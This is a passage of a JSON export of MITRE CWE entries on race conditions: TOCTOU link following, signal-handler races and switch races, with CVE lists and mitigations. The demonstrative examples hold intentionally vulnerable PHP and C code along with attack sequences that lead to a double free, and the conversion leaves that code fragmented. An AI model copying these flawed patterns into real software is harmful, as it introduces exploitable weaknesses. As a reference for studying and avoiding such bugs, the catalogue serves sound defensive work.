keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"},{"Reference":"CVE-2014-8273","Description":"Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8273"},{"Reference":"CVE-2008-5044","Description":"Race condition leading to a crash by calling a hook removal procedure while other activities are occurring at the same time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5044"},{"Reference":"CVE-2008-2958","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2958"},{"Reference":"CVE-2008-1570","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1570"},{"Reference":"CVE-2008-0058","Description":"Unsynchronized caching operation enables a race condition that causes messages to be sent to a deallocated object.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0058"},{"Reference":"CVE-2008-0379","Description":"Race condition during initialization triggers a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0379"},{"Reference":"CVE-2007-6599","Description":"Daemon crash by quickly performing operations and undoing them, which eventually leads to an operation that does not acquire a lock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6599"},{"Reference":"CVE-2007-6180","Description":"chain: race condition triggers NULL pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6180"},{"Reference":"CVE-2007-5794","Description":"Race condition in library function could cause data to be sent to the wrong process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794"},{"Reference":"CVE-2007-3970","Description":"Race condition in file parser leads to heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3970"},{"Reference":"CVE-2008-5021","Description":"chain: race condition allows attacker to access an object while it is still being initialized, causing software to access uninitialized memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021"},{"Reference":"CVE-2009-4895","Description":"chain: race condition for an argument value, possibly resulting in NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4895"},{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Race Conditions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 13: Race Conditions." Page 205"}},{"attr":{"@_External_Reference_ID":"REF-349"}},{"attr":{"@_External_Reference_ID":"REF-350"}},{"attr":{"@_External_Reference_ID":"REF-351"}},{"attr":{"@_External_Reference_ID":"REF-352"}},{"attr":{"@_External_Reference_ID":"REF-353"}},{"attr":{"@_External_Reference_ID":"REF-354"}},{"attr":{"@_External_Reference_ID":"REF-355"}},{"attr":{"@_External_Reference_ID":"REF-356"}},{"attr":{"@_External_Reference_ID":"REF-357"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-1237"}}]},"Notes":{"Note":[{"#text":"The relationship between race conditions and synchronization problems (CWE-662) needs to be further developed. They are not necessarily two perspectives of the same core concept, since synchronization is only one technique for avoiding race conditions, and synchronization can be used for other purposes besides race condition prevention.","attr":{"@_Type":"Maintenance"}},{"#text":"Race conditions in web applications are under-studied and probably under-reported. However, in 2008 there has been growing interest in this area.","attr":{"@_Type":"Research Gap"}},{"#text":"Much of the focus of race condition research has been in Time-of-check Time-of-use (TOCTOU) variants (CWE-367), but many race conditions are related to synchronization problems that do not necessarily require a time-of-check.","attr":{"@_Type":"Research Gap"}},{"#text":"From a classification/taxonomy perspective, the relationships between concurrency and program state need closer investigation and may be useful in organizing related issues.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, References, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example"},"Previous_Entry_Name":[{"#text":"Race Conditions","attr":{"@_Date":"2008-04-11"}},{"#text":"Race Condition","attr":{"@_Date":"2010-12-13"}}]}},"363":{"attr":{"@_ID":"363","@_Name":"Race Condition Enabling Link Following","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the software to access the wrong file.","Extended_Description":"While developers might expect that there is a very narrow time window between the time of check and time of use, there is still a race condition. An attacker could cause the software to slow down (e.g. with memory consumption), causing the time window to become larger. Alternately, in some situations, the attacker could win the race by performing a large number of attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"367","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"59","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-49"},"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();if(is_link($filename)){}if(fileowner($filename) == $user){}else{}","xhtml:br":["","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$filename = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Race condition enabling link following"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS35-C","Entry_Name":"Avoid race conditions while checking for the existence of a symbolic link","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Race Conditions", Page 526"}}},"Notes":{"Note":{"#text":"This is already covered by the \\"Link Following\\" weakness (CWE-59). It is included here because so many people associate race conditions with link problems; however, not all link following issues involve race conditions.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"364":{"attr":{"@_ID":"364","@_Name":"Signal Handler Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a signal handler that introduces a race condition.","Extended_Description":{"xhtml:p":["Race conditions frequently occur in signal handlers, since signal handlers support asynchronous actions. These race conditions have a variety of root causes and symptoms. Attackers may be able to exploit a signal handler race condition to cause the software state to be corrupted, possibly leading to a denial of service or even code execution.","These issues occur when non-reentrant functions, or state-sensitive actions occur in the signal handler, where they may be called at any time. These behaviors can violate assumptions being made by the \\"regular\\" code that is interrupted, or by other signal handlers that may also be invoked. If these functions are called at an inopportune moment - such as while a non-reentrant function is already running - memory corruption could occur that may be exploitable for code execution. Another signal race condition commonly found occurs when free is called within a signal handler, resulting in a double free and therefore a write-what-where condition. Even if a given pointer is set to NULL after it has been freed, a race condition still exists between the time the memory was freed and the pointer was set to NULL. This is especially problematic if the same signal handler has been set for more than one signal -- since it means that the signal handler itself may be reentered.","There are several known behaviors related to signal handlers that have received the label of \\"signal handler race condition\\":","Signal handler vulnerabilities are often classified based on the absence of a specific protection mechanism, although this style of classification is discouraged in CWE because programmers often have a choice of several different mechanisms for addressing the weakness. Such protection mechanisms may preserve exclusivity of access to the shared resource, and behavioral atomicity for the relevant code:"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Shared state (e.g. global data or static variables) that are accessible to both a signal handler and \\"regular\\" code","Shared state between a signal handler and other signal handlers","Use of non-reentrant functionality within a signal handler - which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution.","Association of the same signal handler function with multiple signals - which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses.","Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality","While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses."]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Avoiding shared state","Using synchronization in the signal handler","Using synchronization in the regular code","Disabling or masking other signals, which provides atomicity (which effectively ensures exclusivity)"]}}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"415","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"416","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"It may be possible to cause data corruption and possibly execute arbitrary code by modifying global variables or data structures at unexpected times, violating the assumptions of code that uses this global data."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If a signal handler interrupts code that is executing with privileges, it may be possible that the signal handler will also be executed with elevated privileges, possibly making subsequent exploits more severe."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":"Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"Phase":"Architecture and Design","Description":"Design signal handlers to only set flags, rather than perform complex functionality. These flags can then be checked and acted upon within the main program loop."},{"Phase":"Implementation","Description":"Only use reentrant functions within signal handlers. Also, use validation to ensure that state is consistent while performing asynchronous actions that affect the state of execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]},{"attr":{"@_Demonstrative_Example_ID":"DX-48"},"Intro_Text":"The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <signal.h>#include <syslog.h>#include <string.h>#include <stdlib.h>void *global1, *global2;char *what;void sh (int dummy) {}int main (int argc,char* argv[]) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",what);free(global2);free(global1);sleep(10);exit(0);","xhtml:br":["","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}}]}},"Body_Text":["However, the following sequence of events may result in a double-free (CWE-415):",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a SIGHUP is delivered to the process"},{"xhtml:div":"sh() is invoked to process the SIGHUP"},{"xhtml:div":"This first invocation of sh() reaches the point where global1 is freed"},{"xhtml:div":"At this point, a SIGTERM is sent to the process"},{"xhtml:div":"the second invocation of sh() might do another free of global1"},{"xhtml:div":"this results in a double-free (CWE-415)"}]}},"This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within \\"Delivering Signals for Fun and Profit\\" [REF-360]."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0035","Description":"Signal handler does not disable other signal handlers, allowing it to be interrupted, causing other functionality to access files/etc. with raised privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0035"},{"Reference":"CVE-2001-0905","Description":"Attacker can send a signal while another signal handler is already running, leading to crash or execution with root privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0905"},{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-0794","Description":"SIGURG can be used to remotely interrupt signal handler; other variants exist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0794"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Functional_Areas":{"Functional_Area":["Signals","Interprocess Communication"]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Signal handler race condition"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Signal Handling Race Conditions"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in signal handler"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 13: Race Conditions." Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, "Signal Vulnerabilities", Page 791"}}]},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"365":{"attr":{"@_ID":"365","@_Name":"Race Condition in Switch","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a switch statement in which the switched variable can be modified while the switch is still executing, resulting in unexpected behavior.","Extended_Description":"This issue is particularly important in the case of switch statements that involve fall-through style case statements - i.e., those which do not end with break. If the variable being tested by the switch changes in the course of execution, this could change the intended logic of the switch so much that it places the process in a contradictory state and in some cases could even result in memory corruption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"367","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"364","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"366","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"This weakness may lead to unexpected system state, resulting in unpredictable behavior."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Variables that may be subject to race conditions should be locked before the switch statement starts and only unlocked after the statement ends."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example has a switch statement that executes different code depending on the current time.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <sys/types.h>#include <sys/stat.h>int main(argc,argv){}","xhtml:br":["",""],"xhtml:div":{"#text":"struct stat *sb;time_t timer;lstat(\\"bar.sh\\",sb);printf(\\"%d\\\\n\\",sb->st_ctime);switch(sb->st_ctime % 2){}return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":{"#text":"case 0: printf(\\"One option\\\\n\\");break;case 1: printf(\\"another option\\\\n\\");break;default: printf(\\"huh\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}}},"Body_Text":"It seems that the default case of the switch statement should never be reached, as st_ctime % 2 should always be 0 or 1. However, if st_ctime % 2 is 1 when the first case is evaluated, the time may change and st_ctime % 2 may be equal to 0 when the second case is evaluated. The result is that neither case 1 or case 2 execute, and the default option is chosen."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in switch"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 13: Race Conditions." Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, 